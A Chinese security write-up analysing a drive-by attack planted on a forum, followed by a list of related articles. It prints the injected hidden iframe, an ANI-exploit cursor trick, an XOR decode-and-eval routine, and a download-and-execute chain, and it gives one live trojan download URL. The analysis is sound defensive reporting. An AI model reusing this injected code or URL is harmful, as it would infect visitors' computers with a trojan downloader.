某论坛新游试玩区被植入利用ANI漏洞传播 Trojan.Mnless.kip 的代码

简介: 某论坛新游试玩区被植入利用ANI漏洞传播 Trojan.Mnless.kip 的代码

加入的代码为:

/---
<iframe src='hxxp://s**72.91**152**0.net/site/g****g/1**.htm' height=0 width=50></iframe>
---/

hxxp://s**72.91**152**0.net/site/g****g/1**.htm 包含为:

/---
<DIV
style="CURSOR: url('love.jpg')"></DIV></DIV></BODY></HTML>
<iframe src=hxxp://s**72.91**152**0.net/site/g****g/1**4.htm  name="main1" height="0" width="100" ></iframe>
---/

love.jpg(Kaspersky报为Exploit.Win32.IMG-ANI.k)下载  http://mail.8u8y.com/ad/pic/1.exe

文件说明符 : D:/test/1.exe

Kaspersky 报为 Trojan-Downloader.Win32.Delf.bga ,瑞星报为 Trojan.Mnless.kip

hxxp://s**72.91**152**0.net/site/g****g/1**4.htm的内容为JavaScript脚本代码,功能为用自定义函数:

/---
var Z=function(m){return String.fromCharCode(m^79)};
---/

解密代码并通过 eval() 来运行。

解密后的 内容仍为JavaScript脚本代码,功能为

是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 hxxp://mail.8***u**8y.com/ad/pic***/temp.exe,保存到%windir%,文件名由自定义函数:

/---
function gn(n){var number = Math.random()*n;
return '~tmp'+Math.round(number)+'.exe';}
---/

生成,即 ~tmp****.exe,其中****为 数字。然后通过 Shell.Application 对象 Q 的 ShellExecute 方法运行。

temp.exe与前面的1.exe相同。


相关文章
|
2月前
|
安全
某留学网站被植入利用 PPStream 堆栈漏洞的代码
某留学网站被植入利用 PPStream 堆栈漏洞的代码
|
编解码 缓存 资源调度
揭密浏览器指纹:原来我们一直被互联网巨头监视,隐私在网上裸奔、无处可藏
今天讲⼀些让您按捺不住和欲求不满的反浏览器追踪技术,揭开你是如果被互联网巨头监控的。
366 0
揭密浏览器指纹:原来我们一直被互联网巨头监视,隐私在网上裸奔、无处可藏
|
小程序
微信这项功能太流氓了!
经过10年的发展,微信已经成了名副其实的国民应用。 无论是大人小孩,从事何种职业,微信已经成为了手机必备软件。
微信这项功能太流氓了!
|
安全
端午小长假谨防挂马网站 病毒模仿杀软骗取钱财
随着端午小长假的临近,上网人数增加,这段时间的挂马网站和木马病毒都有肆虐的趋势。5月25日,瑞星“云安全”系统就从截获的挂马网站中,发现了一个冒充杀毒软件、企图骗取钱财的广告软件病毒,并命名为“WINPC 广告病毒(Adware.Win32.Agent.Dbj)”。
1095 0
|
Web App开发 云安全 安全
IE漏洞致数百万用户中招 快用瑞星卡卡打补丁
北京时间12月18日凌晨,微软发布了针对IE浏览器漏洞的最新补丁MS08-078,这是该公司今年第二次打破常规发布紧急漏洞补丁。瑞星旗下卡卡上网安全助手也进行了紧急升级,非正版软件用户可以用瑞星卡卡(http://tool.ikaka.com)来弥补这个系统漏洞。
1100 0
|
安全 Windows
卡巴提醒:新型魔兽盗号木马现身 玩家须小心提防
《魔兽世界》作为全球第一大网络游戏,吸引了大批玩家,自然也成为恶意程序攻击的重点对象。针对魔兽的盗号木马、后门程序等一直层出不穷。 卡巴斯基实验室近期检测到一种名为“魔兽猎手”的盗号木马(Trojan-GameThief.Win32.WOW.inn)肆虐网络,造成不少玩家感染,损失惨重。
920 0
|
安全 数据安全/隐私保护
卡巴斯基:五一期间谨防“NS下载器”木马程序
“五一劳动节”即将到来,从而也为平日紧张工作的人们提供了一个放松神经的“缓冲期”,但这对恶意程序制造者来说,却是其“吸金”的“好”机会。据国际知名信息安全厂商卡巴斯基的病毒监测报告显示,一个名为“NS下载器”木马程序近期处于高危爆发阶段,其可通过可移动存储设备对用户的计算机进行感染,对用户的个人信息安全将在一定程度上带来严重威胁。
1073 0
|
安全 网络安全 数据库
游戏安全资讯精选 2017年第十三期 Typecho前台无限制Getshell漏洞预警,勒索软件市场正在呈爆炸式增长
Typecho前台无限制Getshell漏洞预警,勒索软件市场正在呈爆炸式增长
1960 0
|
云安全 安全 Windows
游戏安全资讯精选 2017年 第八期:从“马甲”到“刷金”,盘点网络游戏的攻击和欺诈,微软“9月周二补丁日”发布81个漏洞补丁,系统优化工具CCleaner被植入后门
从“马甲”到“刷金”,盘点网络游戏的攻击和欺诈,微软“9月周二补丁日”发布81个漏洞补丁,系统优化工具CCleaner被植入后门
2126 0
|
安全
知名Mac软件被黑植入后门,连累更新用户代码被窃、惨遭勒索
本文讲的是知名Mac软件被黑植入后门,连累更新用户代码被窃、惨遭勒索,编者按:本文来自Panic公司(开发 Mac 和 iOS 软件)官方博客,为其联合创始人Steven Frank的亲身经历,该公司有一款大受好评的游戏叫《Firewatch(看火人)》。
1379 0